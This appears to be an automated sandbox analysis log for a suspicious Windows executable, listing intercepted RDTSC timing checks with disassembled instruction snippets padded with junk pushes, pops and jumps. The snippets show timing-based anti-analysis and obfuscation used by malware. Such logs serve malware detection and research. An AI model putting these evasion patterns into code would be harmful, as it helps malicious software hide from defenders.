Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3CB3A9 second address: 3CB3AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3CB716 second address: 3CB71E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3D13DC second address: 3D141D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F4688C929FDh 0x0000000b jmp 00007F4688C929DEh 0x00000010 jmp 00007F4688C929E9h 0x00000015 pushad 0x00000016 jng 00007F4688C929D6h 0x0000001c jo 00007F4688C929D6h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3D1715 second address: 3D1719 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3D1719 second address: 3D1726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3D1726 second address: 3D172E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3D1F93 second address: 3D1FA3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4688C929D6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3D1FA3 second address: 3D1FA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3D1FA7 second address: 3D1FAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3D2306 second address: 3D230C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3D230C second address: 3D239C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jng 00007F4688C929E2h 0x0000000f jno 00007F4688C929D6h 0x00000015 jc 00007F4688C929D6h 0x0000001b push ecx 0x0000001c push edi 0x0000001d pop edi 0x0000001e push esi 0x0000001f pop esi 0x00000020 pop ecx 0x00000021 popad 0x00000022 pushad 0x00000023 pushad 0x00000024 jng 00007F4688C929D6h 0x0000002a jmp 00007F4688C929E2h 0x0000002f popad 0x00000030 js 00007F4688C929E7h 0x00000036 jmp 00007F4688C929DBh 0x0000003b je 00007F4688C929D6h 0x00000041 pushad 0x00000042 jmp 00007F4688C929E9h 0x00000047 jbe 00007F4688C929D6h 0x0000004d popad 0x0000004e push eax 0x0000004f push edx 0x00000050 jl 00007F4688C929D6h 0x00000056 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3D239C second address: 3D23A6 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4688C1B766h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3D25D6 second address: 3D25DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3D25DC second address: 3D25E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3D287E second address: 3D2882 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3D2882 second address: 3D288A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3D99F4 second address: 3D9A00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F4688C929D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3D8B1D second address: 3D8B2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007F4688C1B766h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3D8B2E second address: 3D8B38 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4688C929D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3D8C95 second address: 3D8CBD instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4688C1B778h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jbe 00007F4688C1B766h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3D8CBD second address: 3D8CC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3D937A second address: 3D937E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3D937E second address: 3D938C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929DAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3D938C second address: 3D93A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 jp 00007F4688C1B76Ch 0x0000000e jnp 00007F4688C1B766h 0x00000014 pushad 0x00000015 push edi 0x00000016 pop edi 0x00000017 push eax 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3D94F4 second address: 3D9500 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4688C929D6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3D9500 second address: 3D951A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4688C1B776h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3D951A second address: 3D9531 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4688C929D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jp 00007F4688C929D6h 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3D9531 second address: 3D9560 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B779h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4688C1B76Eh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3D96E8 second address: 3D96F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F4688C929D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3DE358 second address: 3DE362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F4688C1B766h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3DE362 second address: 3DE366 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3E533B second address: 3E5349 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jnp 00007F4688C1B766h 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3E565F second address: 3E5697 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E4h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4688C929DDh 0x00000013 push ebx 0x00000014 jo 00007F4688C929D6h 0x0000001a jno 00007F4688C929D6h 0x00000020 pop ebx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3E5697 second address: 3E569D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3E569D second address: 3E56AB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4688C929D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3E586A second address: 3E5874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F4688C1B766h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3E5A0A second address: 3E5A10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3E5A10 second address: 3E5A14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3E5CC0 second address: 3E5CDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 jmp 00007F4688C929E5h 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3E5CDF second address: 3E5CE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3E5CE5 second address: 3E5D12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push ecx 0x00000007 jng 00007F4688C929F3h 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3ED0E1 second address: 3ED0EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F4688C1B766h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3ED21F second address: 3ED235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F4688C929DDh 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3ED235 second address: 3ED23D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3ED23D second address: 3ED241 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3ED39C second address: 3ED3A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3ED3A0 second address: 3ED3A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3ED3A6 second address: 3ED3AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3EF8C7 second address: 3EF8DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F4688C929D6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f pushad 0x00000010 jp 00007F4688C929D6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 32DB48 second address: 32DB4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 32DB4E second address: 32DB57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 32DB57 second address: 32DB5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 32DB5B second address: 32DB5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3FD339 second address: 3FD361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4688C1B76Bh 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jmp 00007F4688C1B76Ch 0x00000010 popad 0x00000011 push ecx 0x00000012 jbe 00007F4688C1B766h 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a pop ecx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3FD4AD second address: 3FD4B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3FD4B5 second address: 3FD4B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 4004F9 second address: 40051C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F4688C929E1h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 40051C second address: 40053A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F4688C1B770h 0x0000000f jmp 00007F4688C1B76Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 40053A second address: 40053F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 411FC0 second address: 411FC6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 411E0B second address: 411E2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F4688C929EDh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 41B9C4 second address: 41B9CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 41B9CA second address: 41B9CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 41A6A9 second address: 41A6BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 41A6BD second address: 41A6C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 41A6C3 second address: 41A6D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007F4688C1B76Bh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 41A6D6 second address: 41A6ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F4688C929DCh 0x0000000b jno 00007F4688C929D6h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 41AAF1 second address: 41AAF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 41B71F second address: 41B72B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jo 00007F4688C929D6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 41E331 second address: 41E33B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F4688C1B766h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 44076B second address: 44076F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 45955F second address: 459565 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 459807 second address: 45980C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 45980C second address: 45981E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F4688C1B766h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 45981E second address: 459822 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 459970 second address: 459978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 459978 second address: 45997C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 45997C second address: 4599A7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4688C1B766h 0x00000008 jng 00007F4688C1B766h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007F4688C1B770h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 jc 00007F4688C1B766h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 4599A7 second address: 4599B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 459E99 second address: 459EA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 459EA1 second address: 459EA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 45A00F second address: 45A013 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 45A013 second address: 45A023 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F4688C929D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 45A023 second address: 45A027 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 45A027 second address: 45A04D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a jo 00007F4688C929E2h 0x00000010 jg 00007F4688C929D6h 0x00000016 jo 00007F4688C929D6h 0x0000001c push eax 0x0000001d push edx 0x0000001e push edx 0x0000001f pop edx 0x00000020 je 00007F4688C929D6h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 45A04D second address: 45A051 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 45A051 second address: 45A057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 45BC55 second address: 45BC6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F4688C1B771h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 461552 second address: 461557 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 461557 second address: 46156D instructions: 0x00000000 rdtsc 0x00000002 je 00007F4688C1B768h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jnp 00007F4688C1B76Eh 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 46156D second address: 46157C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 46157C second address: 4615A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4688C1B775h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 462D69 second address: 462D6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5450019 second address: 545001F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
